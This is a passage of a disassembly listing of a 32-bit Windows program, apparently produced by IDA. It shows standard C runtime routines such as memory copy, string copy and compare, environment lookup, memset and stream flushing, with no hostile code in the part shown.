jmp off_4066A0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4065B8
dd offset loc_4065D8
dd offset loc_406600
; ---------------------------------------------------------------------------
loc_4065B8: ; DATA XREF: sub_4063C0+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_406580
std
rep movsd
cld
jmp off_4066A0[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4065D8: ; DATA XREF: sub_4063C0+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_406580
std
rep movsd
cld
jmp off_4066A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_406600: ; DATA XREF: sub_4063C0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_406580
std
rep movsd
cld
jmp off_4066A0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_406654
dd offset loc_40665C
dd offset loc_406664
dd offset loc_40666C
dd offset loc_406674
dd offset loc_40667C
dd offset loc_406684
off_406650 dd offset loc_406697 ; DATA XREF: sub_4063C0+1C2�r
; ---------------------------------------------------------------------------
loc_406654: ; DATA XREF: sub_4063C0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40665C: ; DATA XREF: sub_4063C0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_406664: ; DATA XREF: sub_4063C0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40666C: ; DATA XREF: sub_4063C0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_406674: ; DATA XREF: sub_4063C0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40667C: ; DATA XREF: sub_4063C0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_406684: ; DATA XREF: sub_4063C0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_406697: ; CODE XREF: sub_4063C0+1C2�j
; DATA XREF: sub_4063C0:off_406650�o
jmp off_4066A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4066A0 dd offset loc_4066B0 ; DATA XREF: sub_4063C0+1B7�r
; sub_4063C0:loc_4065A4�r ...
dd offset loc_4066B8
dd offset loc_4066C8
dd offset loc_4066DC
; ---------------------------------------------------------------------------
loc_4066B0: ; CODE XREF: sub_4063C0+1B7�j
; sub_4063C0:loc_4065A4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4066B8: ; CODE XREF: sub_4063C0+1B7�j
; sub_4063C0:loc_4065A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4066C8: ; CODE XREF: sub_4063C0+1B7�j
; sub_4063C0:loc_4065A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4066DC: ; CODE XREF: sub_4063C0+1B7�j
; sub_4063C0:loc_4065A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4063C0 endp
; =============== S U B R O U T I N E =======================================
sub_4066F5 proc near ; CODE XREF: sub_404E3C+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_409CD8, ebx
push esi
push edi
jnz short loc_406744
push offset aUser32_dll ; "user32.dll"
call dword_408020
mov edi, eax
cmp edi, ebx
jz short loc_40677A
mov esi, dword_408024
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi
test eax, eax
mov dword_409CD8, eax
jz short loc_40677A
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_409CDC, eax
call esi
mov dword_409CE0, eax
loc_406744: ; CODE XREF: sub_4066F5+B�j
mov eax, dword_409CDC
test eax, eax
jz short loc_406763
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_406763
mov eax, dword_409CE0
test eax, eax
jz short loc_406763
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_406763: ; CODE XREF: sub_4066F5+56�j
; sub_4066F5+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_409CD8 ; MessageBoxA
loc_406776: ; CODE XREF: sub_4066F5+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40677A: ; CODE XREF: sub_4066F5+1C�j
; sub_4066F5+33�j
xor eax, eax
jmp short loc_406776
sub_4066F5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406780 proc near ; CODE XREF: sub_404E3C+C5�p
; sub_4052DA+184�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_406803
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4067A4
shr ecx, 2
jnz short loc_406811
jmp short loc_4067C5
; ---------------------------------------------------------------------------
loc_4067A4: ; CODE XREF: sub_406780+1B�j
; sub_406780+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4067D2
test al, al
jz short loc_4067DA
test esi, 3
jnz short loc_4067A4
mov ebx, ecx
shr ecx, 2
jnz short loc_406811
loc_4067C0: ; CODE XREF: sub_406780+8F�j
and ebx, 3
jz short loc_4067D2
loc_4067C5: ; CODE XREF: sub_406780+22�j
; sub_406780+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_4067FE
dec ebx
jnz short loc_4067C5
loc_4067D2: ; CODE XREF: sub_406780+2B�j
; sub_406780+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4067DA: ; CODE XREF: sub_406780+2F�j
test edi, 3
jz short loc_4067F4
loc_4067E2: ; CODE XREF: sub_406780+72�j
mov [edi], al
inc edi
dec ecx
jz loc_406876
test edi, 3
jnz short loc_4067E2
loc_4067F4: ; CODE XREF: sub_406780+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_406867
loc_4067FB: ; CODE XREF: sub_406780+7F�j
; sub_406780+F4�j
mov [edi], al
inc edi
loc_4067FE: ; CODE XREF: sub_406780+4D�j
dec ebx
jnz short loc_4067FB
pop ebx
pop esi
loc_406803: ; CODE XREF: sub_406780+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406780+A9�j
; sub_406780+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4067C0
loc_406811: ; CODE XREF: sub_406780+20�j
; sub_406780+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_406809
test dl, dl
jz short loc_40685B
test dh, dh
jz short loc_406851
test edx, 0FF0000h
jz short loc_406847
test edx, 0FF000000h
jnz short loc_406809
mov [edi], edx
jmp short loc_40685F
; ---------------------------------------------------------------------------
loc_406847: ; CODE XREF: sub_406780+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40685F
; ---------------------------------------------------------------------------
loc_406851: ; CODE XREF: sub_406780+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40685F
; ---------------------------------------------------------------------------
loc_40685B: ; CODE XREF: sub_406780+AD�j
xor edx, edx
mov [edi], edx
loc_40685F: ; CODE XREF: sub_406780+C5�j
; sub_406780+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_406871
loc_406867: ; CODE XREF: sub_406780+79�j
xor eax, eax
loc_406869: ; CODE XREF: sub_406780+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_406869
loc_406871: ; CODE XREF: sub_406780+E5�j
and ebx, 3
jnz short loc_4067FB
loc_406876: ; CODE XREF: sub_406780+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_406780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406880 proc near ; CODE XREF: sub_4052DA+13D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_4068CC
loc_406890: ; CODE XREF: sub_406880+3C�j
; sub_406880+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_4068C4
or al, al
jz short loc_4068C0
cmp ah, [ecx+1]
jnz short loc_4068C4
or ah, ah
jz short loc_4068C0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_4068C4
or al, al
jz short loc_4068C0
cmp ah, [ecx+3]
jnz short loc_4068C4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_406890
mov edi, edi
loc_4068C0: ; CODE XREF: sub_406880+18�j
; sub_406880+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4068C4: ; CODE XREF: sub_406880+14�j
; sub_406880+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4068CC: ; CODE XREF: sub_406880+E�j
test edx, 1
jz short loc_4068E8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_4068C4
inc ecx
or al, al
jz short loc_4068C0
test edx, 2
jz short loc_406890
loc_4068E8: ; CODE XREF: sub_406880+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_4068C4
or al, al
jz short loc_4068C0
cmp ah, [ecx+1]
jnz short loc_4068C4
or ah, ah
jz short loc_4068C0
add ecx, 2
jmp short loc_406890
sub_406880 endp
; =============== S U B R O U T I N E =======================================
sub_406904 proc near ; CODE XREF: sub_4052DA+23�p
arg_0 = dword ptr 4
cmp dword_518624, 0
push ebx
push esi
mov esi, dword_409AA8
push edi
jz short loc_40697B
test esi, esi
jnz short loc_406935
cmp dword_409AB0, esi
jz short loc_40697B
call sub_406F76
test eax, eax
jnz short loc_40697B
mov esi, dword_409AA8
test esi, esi
jz short loc_40697B
loc_406935: ; CODE XREF: sub_406904+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_40697B
push ebx
call sub_405B90
pop ecx
mov edi, eax
loc_406946: ; CODE XREF: sub_406904+6D�j
mov eax, [esi]
test eax, eax
jz short loc_40697B
push eax
call sub_405B90
cmp eax, edi
pop ecx
jbe short loc_40696E
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_40696E
push edi
push ebx
push eax
call sub_406F37
add esp, 0Ch
test eax, eax
jz short loc_406973
loc_40696E: ; CODE XREF: sub_406904+51�j
; sub_406904+59�j
add esi, 4
jmp short loc_406946
; ---------------------------------------------------------------------------
loc_406973: ; CODE XREF: sub_406904+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_40697D
; ---------------------------------------------------------------------------
loc_40697B: ; CODE XREF: sub_406904+10�j
; sub_406904+1C�j ...
xor eax, eax
loc_40697D: ; CODE XREF: sub_406904+75�j
pop edi
pop esi
pop ebx
retn
sub_406904 endp
; =============== S U B R O U T I N E =======================================
sub_406981 proc near ; CODE XREF: sub_405824+6B�p
; sub_4058BE+160�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_409A84, ecx
mov eax, offset dword_409900
loc_406992: ; CODE XREF: sub_406981+1E�j
cmp ecx, [eax]
jz short loc_4069B6
add eax, 8
inc edx
cmp eax, offset dword_409A68
jl short loc_406992
cmp ecx, 13h
jb short loc_4069C3
cmp ecx, 24h
ja short loc_4069C3
mov dword_409A80, 0Dh
retn
; ---------------------------------------------------------------------------
loc_4069B6: ; CODE XREF: sub_406981+13�j
mov eax, dword_409904[edx*8]
mov dword_409A80, eax
retn
; ---------------------------------------------------------------------------
loc_4069C3: ; CODE XREF: sub_406981+23�j
; sub_406981+28�j
cmp ecx, 0BCh
jb short loc_4069DD
cmp ecx, 0CAh
mov dword_409A80, 8
jbe short locret_4069E7
loc_4069DD: ; CODE XREF: sub_406981+48�j
mov dword_409A80, 16h
locret_4069E7: ; CODE XREF: sub_406981+5A�j
retn
sub_406981 endp
; =============== S U B R O U T I N E =======================================
sub_4069E8 proc near ; CODE XREF: sub_407554+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_518600
push edi
jnb short loc_406A4B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:518500h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_406A4B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_406A4B
cmp dword_4090F4, 1
jnz short loc_406A41
xor eax, eax
sub ecx, eax
jz short loc_406A38
dec ecx
jz short loc_406A33
dec ecx
jnz short loc_406A41
push eax
push 0FFFFFFF4h
jmp short loc_406A3B
; ---------------------------------------------------------------------------
loc_406A33: ; CODE XREF: sub_4069E8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_406A3B
; ---------------------------------------------------------------------------
loc_406A38: ; CODE XREF: sub_4069E8+3E�j
push eax
push 0FFFFFFF6h
loc_406A3B: ; CODE XREF: sub_4069E8+49�j
; sub_4069E8+4E�j
call dword_40801C
loc_406A41: ; CODE XREF: sub_4069E8+38�j
; sub_4069E8+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_406A5F
; ---------------------------------------------------------------------------
loc_406A4B: ; CODE XREF: sub_4069E8+C�j
; sub_4069E8+2A�j ...
and dword_409A84, 0
mov dword_409A80, 9
or eax, 0FFFFFFFFh
loc_406A5F: ; CODE XREF: sub_4069E8+61�j
pop edi
pop esi
retn
sub_4069E8 endp
; =============== S U B R O U T I N E =======================================
sub_406A62 proc near ; CODE XREF: sub_405824+2D�p
; sub_40703A+25�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_518600
jnb short loc_406A8A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_518500[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_406A8A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_406A8A: ; CODE XREF: sub_406A62+A�j
; sub_406A62+23�j
and dword_409A84, 0
mov dword_409A80, 9
or eax, 0FFFFFFFFh
retn
sub_406A62 endp
; =============== S U B R O U T I N E =======================================
sub_406A9F proc near ; CODE XREF: sub_405AD5+22�p
; sub_405AD5+3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
imul esi, [esp+0Ch+arg_4]
cmp esi, 0FFFFFFE0h
mov ebx, esi
ja short loc_406ABF
test esi, esi
jnz short loc_406AB9
push 1
pop esi
loc_406AB9: ; CODE XREF: sub_406A9F+15�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_406ABF: ; CODE XREF: sub_406A9F+11�j
; sub_406A9F+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_406AF0
cmp ebx, dword_4090FC
ja short loc_406ADB
push ebx
call sub_40340A
mov edi, eax
pop ecx
test edi, edi
jnz short loc_406B06
loc_406ADB: ; CODE XREF: sub_406A9F+2D�j
push esi
push 8
push dword_51861C
call dword_40806C
mov edi, eax
test edi, edi
jnz short loc_406B12
loc_406AF0: ; CODE XREF: sub_406A9F+25�j
cmp dword_409AF4, 0
jz short loc_406B12
push esi
call sub_40301F
test eax, eax
pop ecx
jz short loc_406B18
jmp short loc_406ABF
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_406A9F+3A�j
push ebx
push 0
push edi
call sub_406C90
add esp, 0Ch
loc_406B12: ; CODE XREF: sub_406A9F+4F�j
; sub_406A9F+58�j
mov eax, edi
loc_406B14: ; CODE XREF: sub_406A9F+7B�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_406B18: ; CODE XREF: sub_406A9F+63�j
xor eax, eax
jmp short loc_406B14
sub_406A9F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_405B7A
loc_406B1C: ; CODE XREF: sub_405B7A+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_5184E0, esi
jle short loc_406B6F
loc_406B2B: ; CODE XREF: sub_405B7A+FF3�j
mov eax, dword_5174C8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_406B66
test byte ptr [eax+0Ch], 83h
jz short loc_406B4A
push eax
call sub_406FE4
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406B4A
inc edi
loc_406B4A: ; CODE XREF: sub_405B7A+FC1�j
; sub_405B7A+FCD�j
cmp esi, 14h
jl short loc_406B66
mov eax, dword_5174C8
push dword ptr [eax+esi*4]
call sub_402B18
mov eax, dword_5174C8
pop ecx
and dword ptr [eax+esi*4], 0
loc_406B66: ; CODE XREF: sub_405B7A+FBB�j
; sub_405B7A+FD3�j
inc esi
cmp esi, dword_5184E0
jl short loc_406B2B
loc_406B6F: ; CODE XREF: sub_405B7A+FAF�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_405B7A
; =============== S U B R O U T I N E =======================================
sub_406B74 proc near ; CODE XREF: sub_406C14+2D�p
; sub_406C14+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_406B86
push esi
call sub_406C14
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_406B86: ; CODE XREF: sub_406B74+7�j
push esi
call sub_406BAF
test eax, eax
pop ecx
jz short loc_406B96
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_406B96: ; CODE XREF: sub_406B74+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_406BAB
push dword ptr [esi+10h]
call sub_40703A
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_406BAB: ; CODE XREF: sub_406B74+26�j
xor eax, eax
pop esi
retn
sub_406B74 endp
; =============== S U B R O U T I N E =======================================
sub_406BAF proc near ; CODE XREF: sub_406B74+13�p
; sub_406FE4+1A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_406BFC
test ax, 108h
jz short loc_406BFC
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_406BFC
push edi
push eax
push dword ptr [esi+10h]
call sub_4058BE
add esp, 0Ch
cmp eax, edi
jnz short loc_406BF5
mov eax, [esi+0Ch]
test al, 80h
jz short loc_406BFC
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_406BFC
; ---------------------------------------------------------------------------
loc_406BF5: ; CODE XREF: sub_406BAF+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_406BFC: ; CODE XREF: sub_406BAF+14�j
; sub_406BAF+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_406BAF endp
; =============== S U B R O U T I N E =======================================
sub_406C0B proc near ; CODE XREF: sub_405B7A�p
push 1
call sub_406C14
pop ecx
retn
sub_406C0B endp
; =============== S U B R O U T I N E =======================================
sub_406C14 proc near ; CODE XREF: sub_406B74+A�p
; sub_406C0B+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_5184E0, esi
jle short loc_406C72
loc_406C25: ; CODE XREF: sub_406C14+5C�j
mov eax, dword_5174C8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_406C69
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_406C69
cmp [esp+0Ch+arg_0], 1
jnz short loc_406C4F
push eax
call sub_406B74
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406C69
inc ebx
jmp short loc_406C69
; ---------------------------------------------------------------------------
loc_406C4F: ; CODE XREF: sub_406C14+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_406C69
test cl, 2
jz short loc_406C69
push eax
call sub_406B74
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_406C69
or edi, eax
loc_406C69: ; CODE XREF: sub_406C14+1B�j
; sub_406C14+23�j ...
inc esi
cmp esi, dword_5184E0
jl short loc_406C25
loc_406C72: ; CODE XREF: sub_406C14+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_406C7D
mov eax, edi
loc_406C7D: ; CODE XREF: sub_406C14+65�j
pop edi
pop esi
pop ebx
retn
sub_406C14 endp
; =============== S U B R O U T I N E =======================================
sub_406C81 proc near ; CODE XREF: sub_403D8C+3AA�p
; sub_403D8C+3CB�p ...
push 2
call sub_402FD6
pop ecx
retn
sub_406C81 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406C90 proc near ; CODE XREF: sub_405D65+EF�p
; sub_406A9F+6B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_406CE3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_406CD7
neg ecx
and ecx, 3
jz short loc_406CB9
sub edx, ecx
loc_406CB3: ; CODE XREF: sub_406C90+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_406CB3
loc_406CB9: ; CODE XREF: sub_406C90+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_406CD7
rep stosd
test edx, edx
jz short loc_406CDD
loc_406CD7: ; CODE XREF: sub_406C90+18�j
; sub_406C90+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_406CD7
loc_406CDD: ; CODE XREF: sub_406C90+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_406CE3: ; CODE XREF: sub_406C90+A�j
mov eax, [esp+arg_0]
retn
sub_406C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CE8 proc near ; CODE XREF: sub_40612F+BE�p
; sub_40612F+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_408540
push offset sub_402E08
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_409D04, edi
jnz short loc_406D5E
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4084F0
mov esi, 100h
push esi
push edi
call dword_408014
test eax, eax
jz short loc_406D3C
mov dword_409D04, ebx
jmp short loc_406D5E
; ---------------------------------------------------------------------------
loc_406D3C: ; CODE XREF: sub_406CE8+4A�j
push edi
push edi
push ebx
push offset dword_4084EC
push esi
push edi
call dword_408018
test eax, eax
jz loc_406E76
mov dword_409D04, 2
loc_406D5E: ; CODE XREF: sub_406CE8+2E�j
; sub_406CE8+52�j
cmp [ebp+arg_C], edi
jle short loc_406D73
push [ebp+arg_C]
push [ebp+arg_8]
call sub_406F0C
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_406D73: ; CODE XREF: sub_406CE8+79�j
mov eax, dword_409D04
cmp eax, 2
jnz short loc_406D9A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_408018
jmp loc_406E78
; ---------------------------------------------------------------------------
loc_406D9A: ; CODE XREF: sub_406CE8+93�j
cmp eax, 1
jnz loc_406E76
cmp [ebp+arg_18], edi
jnz short loc_406DB0
mov eax, dword_409CFC
mov [ebp+arg_18], eax
loc_406DB0: ; CODE XREF: sub_406CE8+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_40803C
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_406E76
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_402CE0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_406E0B
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_406E0B: ; CODE XREF: sub_406CE8+10E�j
cmp [ebp+var_24], edi
jz short loc_406E76
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_40803C
test eax, eax
jz short loc_406E76
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_408014
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_406E76
test byte ptr [ebp+arg_4+1], 4
jz short loc_406E8A
cmp [ebp+arg_14], edi
jz loc_406F05
cmp esi, [ebp+arg_14]
jg short loc_406E76
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_408014
test eax, eax
jnz loc_406F05
loc_406E76: ; CODE XREF: sub_406CE8+66�j
; sub_406CE8+B5�j ...
xor eax, eax
loc_406E78: ; CODE XREF: sub_406CE8+AD�j
; sub_406CE8+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406E8A: ; CODE XREF: sub_406CE8+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_402CE0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_406EBE
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_406EBE: ; CODE XREF: sub_406CE8+1C2�j
cmp ebx, edi
jz short loc_406E76
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_408014
test eax, eax
jz short loc_406E76
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_406EE5
push edi
push edi
jmp short loc_406EEB
; ---------------------------------------------------------------------------
loc_406EE5: ; CODE XREF: sub_406CE8+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_406EEB: ; CODE XREF: sub_406CE8+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4080C0
mov esi, eax
cmp esi, edi
jz loc_406E76
loc_406F05: ; CODE XREF: sub_406CE8+165�j
; sub_406CE8+188�j
mov eax, esi
jmp loc_406E78
sub_406CE8 endp
; =============== S U B R O U T I N E =======================================
sub_406F0C proc near ; CODE XREF: sub_406CE8+81�p
; sub_407091+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_406F29
loc_406F1C: ; CODE XREF: sub_406F0C+1B�j
cmp byte ptr [eax], 0
jz short loc_406F29
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_406F1C
loc_406F29: ; CODE XREF: sub_406F0C+E�j
; sub_406F0C+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_406F34
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_406F34: ; CODE XREF: sub_406F0C+21�j
mov eax, edx
retn
sub_406F0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406F37 proc near ; CODE XREF: sub_406904+5E�p
; sub_407495+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
